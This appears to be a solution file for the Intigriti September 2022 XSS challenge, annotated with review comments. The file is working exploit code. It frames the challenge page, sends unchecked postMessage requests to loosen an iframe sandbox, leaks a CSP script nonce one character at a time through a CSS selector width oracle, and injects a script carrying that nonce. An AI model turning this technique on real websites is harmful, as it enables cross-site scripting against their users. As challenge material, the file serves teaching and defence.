Created
September 26, 2022 06:49
intigriti-0922-sol.html
<html>
<body>
  <!--
    Solution page for the challenge hosted at challenge-0922.intigriti.io
    (file name: intigriti-0922-sol.html). It frames the challenge page and
    drives it from a document loaded into the challenge page's child frame.

    Review notes for whoever owns a page shaped like the target:
      * The page is framed by an unrelated origin here. Response headers are
        not visible in this listing; a frame-ancestors policy would have to
        be checked against the real response.
      * Every request below travels as a postMessage carrying a selector, an
        attribute name and a value. NOTE(review): this presumes a message
        listener on the target that applies them without checking
        event.origin or event.source. Confirm against the challenge source.
      * A listener of that kind should accept messages only from expected
        origins and should map a fixed set of actions to fixed elements and
        attributes, never a caller-supplied selector or attribute name.
  -->
  <iframe src="https://challenge-0922.intigriti.io/challenge/index.php" style="width:100vw; height: 100vh"></iframe>
  <script>
    // When the framed challenge page has loaded, navigate its first child
    // frame (frames[0]) to a blob: document built from the template literal
    // below. Only the frame's `location` is assigned; nothing is read from
    // the challenge page's DOM by this outer page.
    //
    // What the blob document does, in order:
    //   1. Sends {action: "set", element, attr, value} messages to
    //      window.parent with target origin "*".
    //   2. The first message asks for the iframe's sandbox attribute to be
    //      set to "allow-scripts allow-same-origin allow-modals".
    //   3. Recovers a script nonce one hex character per round. For each of
    //      the 16 candidates it requests a style with a distinct width
    //      (100px * candidate index) on the iframe selected by
    //      script[nonce^='<known prefix + candidate>'] ~ div iframe.
    //      After a 100 ms wait it reads window.innerWidth / 100 as the index
    //      of the candidate whose selector matched.
    //      NOTE(review): presumably the styled iframe is the frame this
    //      document runs in, which is why its own innerWidth carries the
    //      answer. Confirm against the target markup.
    //   4. Stops once 32 characters are collected (hard-coded length).
    //   5. Asks for the iframe's srcdoc to be set to a script element that
    //      carries the recovered nonce and calls alert(document.domain).
    //
    // The closing script tags inside the string literals are split in two so
    // the HTML parser does not end this outer script element early.
    //
    // Takeaway: a nonce stops injected script only while it cannot be read
    // back. Selector matching on the nonce attribute turns "set a style on
    // whatever this selector matches" into a one-character-at-a-time oracle.
    document.querySelector("iframe").onload = () => {
      document.querySelector("iframe").contentWindow.frames[0].location = URL.createObjectURL(new Blob([`
        <script>
        (async () => {
          let alphabet = "0123456789abcdef".split("");
          let known = "";
          window.parent.postMessage({
            action: "set",
            element: "iframe",
            attr: "sandbox",
            value: "allow-scripts allow-same-origin allow-modals"
          }, "*");
          while(true) {
            console.log(known);
            for(let c of alphabet) {
              window.parent.postMessage({
                action: "set",
                element: "script[nonce^='" + known + c + "'] ~ div iframe",
                attr: "style",
                value: "display: block; width: " + (100 * alphabet.indexOf(c)) + "px"
              }, "*");
            }
            await new Promise(r => setTimeout(r, 100));
            known += alphabet[window.innerWidth / 100];
            if (known.length === 32) {
              break;
            }
          }
          window.parent.postMessage({
            action: "set",
            element: "iframe",
            attr: "srcdoc",
            value: "<script nonce='" + known + "'>alert(document.domain)</sc" + "ript>"
          }, "*");
        })();
        </scr` + `ipt>
      `], {type: "text/html"}));
    }
  </script>
</body>
</html>
Just so you know the nonce length was not fixed to 32.